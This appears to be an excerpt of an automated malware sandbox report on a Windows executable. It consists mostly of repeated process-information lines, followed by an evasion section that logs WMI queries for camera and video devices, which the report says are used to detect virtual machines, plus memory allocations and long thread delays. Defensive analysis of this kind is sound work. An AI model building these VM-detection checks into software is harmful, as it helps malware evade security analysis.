                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeMemory allocated: 1B60000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeMemory allocated: 1B710000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeMemory allocated: 11D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeMemory allocated: 1AC80000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599890Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599781Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599672Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599562Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599453Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599343Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599234Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599125Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 599015Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598902Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598781Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598671Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeThread delayed: delay time: 598562Jump to behavior
